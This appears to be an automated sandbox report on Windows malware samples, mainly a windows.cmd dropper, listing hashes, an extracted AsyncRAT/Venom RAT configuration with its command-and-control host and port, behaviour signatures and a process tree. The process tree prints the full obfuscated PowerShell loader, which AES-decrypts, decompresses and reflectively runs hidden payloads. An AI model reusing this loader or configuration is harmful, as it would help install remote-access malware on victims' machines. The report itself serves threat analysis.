Overview
overview
10Static
static
3Windows_Up...xe.vbs
windows7-x64
1Windows_Up...xe.vbs
windows10-2004-x64
1file.ps1
windows7-x64
1file.ps1
windows10-2004-x64
1fresh.exe
windows7-x64
10fresh.exe
windows10-2004-x64
10loader.ps1
windows7-x64
1loader.ps1
windows10-2004-x64
10payload.ps1
windows7-x64
1payload.ps1
windows10-2004-x64
10update.cmd
windows7-x64
1update.cmd
windows10-2004-x64
10update.vbs
windows7-x64
8update.vbs
windows10-2004-x64
10windows.cmd
windows7-x64
1windows.cmd
windows10-2004-x64
10windows.vbs
windows7-x64
3windows.vbs
windows10-2004-x64
7Analysis
-
max time kernel
129s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
16-03-2024 03:37
Static task
static1
Behavioral task
behavioral1
Sample
Windows_Update.exe.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Windows_Update.exe.vbs
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
file.ps1
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
file.ps1
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
fresh.exe
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
fresh.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
loader.ps1
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
loader.ps1
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
payload.ps1
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
payload.ps1
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
update.cmd
Resource
win7-20240221-en
Behavioral task
behavioral12
Sample
update.cmd
Resource
win10v2004-20240226-en
Behavioral task
behavioral13
Sample
update.vbs
Resource
win7-20240215-en
Behavioral task
behavioral14
Sample
update.vbs
Resource
win10v2004-20240226-en
Behavioral task
behavioral15
Sample
windows.cmd
Resource
win7-20231129-en
Behavioral task
behavioral16
Sample
windows.cmd
Resource
win10v2004-20240226-en
Behavioral task
behavioral17
Sample
windows.vbs
Resource
win7-20240221-en
Behavioral task
behavioral18
Sample
windows.vbs
Resource
win10v2004-20240226-en
General
-
Target
windows.cmd
-
Size
66KB
-
MD5
3a56f31eda19041d7ea9aeab089847eb
-
SHA1
1ca9985ab27390bdd710c5f6d09af344b69ed56b
-
SHA256
562cc7b2b867668ff252095a3bb3dc0641428fddd6ea23cfca475541fc10cbf9
-
SHA512
1c633d473ed3ac06acfb06f012e5c7e0dc8402b8bba9680a4b97fe5282a5f8614331b2bed6132fa4d583f67022aa5ef0a7b96774cda94861c396be2250d149ca
-
SSDEEP
1536:gElMViXyqGaO24iKbBG6IV3VvhRvRt/rCwIK4GfFjR:gn71aO24FdG6INVvhRptTCSNFjR
Malware Config
Extracted
asyncrat
5.0.5
Venom Clients
kdfsv.duckdns.org:8890
Venom_RAT_HVNC_Mutex_Venom RAT_HVNC
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral16/memory/3376-32-0x0000020040BC0000-0x0000020040BD6000-memory.dmp family_asyncrat -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 42 3376 powershell.exe 43 3376 powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 3376 powershell.exe 3376 powershell.exe 4476 powershell.exe 4476 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3376 powershell.exe Token: SeDebugPrivilege 4476 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.execmd.exepowershell.exedescription pid process target process PID 2952 wrote to memory of 2540 2952 cmd.exe cmd.exe PID 2952 wrote to memory of 2540 2952 cmd.exe cmd.exe PID 2540 wrote to memory of 4820 2540 cmd.exe cmd.exe PID 2540 wrote to memory of 4820 2540 cmd.exe cmd.exe PID 2540 wrote to memory of 3376 2540 cmd.exe powershell.exe PID 2540 wrote to memory of 3376 2540 cmd.exe powershell.exe PID 3376 wrote to memory of 4476 3376 powershell.exe powershell.exe PID 3376 wrote to memory of 4476 3376 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows.cmd2⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows.cmd';$WLJw='InCvYLvCvYLokCvYLeCvYL'.Replace('CvYL', ''),'TGQJMraGQJMnsfGQJMormGQJMFinGQJMaGQJMlGQJMBGQJMloGQJMckGQJM'.Replace('GQJM', ''),'SplSyGditSyGd'.Replace('SyGd', ''),'ElwKIbemwKIbewKIbntAwKIbtwKIb'.Replace('wKIb', ''),'LoaLqPaaLqPdaLqP'.Replace('aLqP', ''),'GeZtXeeZtXteZtXCueZtXrreeZtXneZtXtPreZtXoeZtXceseZtXseZtX'.Replace('eZtX', ''),'EntPkLTryPPkLToinPkLTtPkLT'.Replace('PkLT', ''),'CKpdDopyKpdDToKpdD'.Replace('KpdD', ''),'ReeqVLadLeqVLieqVLneeqVLseqVL'.Replace('eqVL', ''),'DdbPkecdbPkompdbPkrdbPkessdbPk'.Replace('dbPk', ''),'CLyDOreaLyDOteLyDODeLyDOcryLyDOpLyDOtLyDOorLyDO'.Replace('LyDO', ''),'FIaBCroIaBCmBaIaBCsIaBCe64IaBCStIaBCrIaBCinIaBCgIaBC'.Replace('IaBC', ''),'MIJoCaIJoCinIJoCMIJoCoduIJoCleIJoC'.Replace('IJoC', ''),'ChaQjVanaQjVgaQjVeaQjVExtaQjVensaQjVioaQjVnaQjV'.Replace('aQjV', '');powershell -w hidden;function ImYLZ($JnwiD){$XxYKa=[System.Security.Cryptography.Aes]::Create();$XxYKa.Mode=[System.Security.Cryptography.CipherMode]::CBC;$XxYKa.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$XxYKa.Key=[System.Convert]::($WLJw[11])('T0dKGXhcNl1TXEBdsATQZk5fcZVOR6MRYQ0653LUp+o=');$XxYKa.IV=[System.Convert]::($WLJw[11])('Z5oBwCXIC4JH125OsE/9wg==');$iuKeX=$XxYKa.($WLJw[10])();$zSovn=$iuKeX.($WLJw[1])($JnwiD,0,$JnwiD.Length);$iuKeX.Dispose();$XxYKa.Dispose();$zSovn;}function pYWXC($JnwiD){$EfKAz=New-Object System.IO.MemoryStream(,$JnwiD);$wKBJr=New-Object System.IO.MemoryStream;$NjZtV=New-Object System.IO.Compression.GZipStream($EfKAz,[IO.Compression.CompressionMode]::($WLJw[9]));$NjZtV.($WLJw[7])($wKBJr);$NjZtV.Dispose();$EfKAz.Dispose();$wKBJr.Dispose();$wKBJr.ToArray();}$lxWGc=[System.IO.File]::($WLJw[8])([Console]::Title);$hbekG=pYWXC (ImYLZ ([Convert]::($WLJw[11])([System.Linq.Enumerable]::($WLJw[3])($lxWGc, 5).Substring(2))));$FPrZl=pYWXC (ImYLZ ([Convert]::($WLJw[11])([System.Linq.Enumerable]::($WLJw[3])($lxWGc, 6).Substring(2))));[System.Reflection.Assembly]::($WLJw[4])([byte[]]$FPrZl).($WLJw[6]).($WLJw[0])($null,$null);[System.Reflection.Assembly]::($WLJw[4])([byte[]]$hbekG).($WLJw[6]).($WLJw[0])($null,$null); "3⤵PID:4820
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4476
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82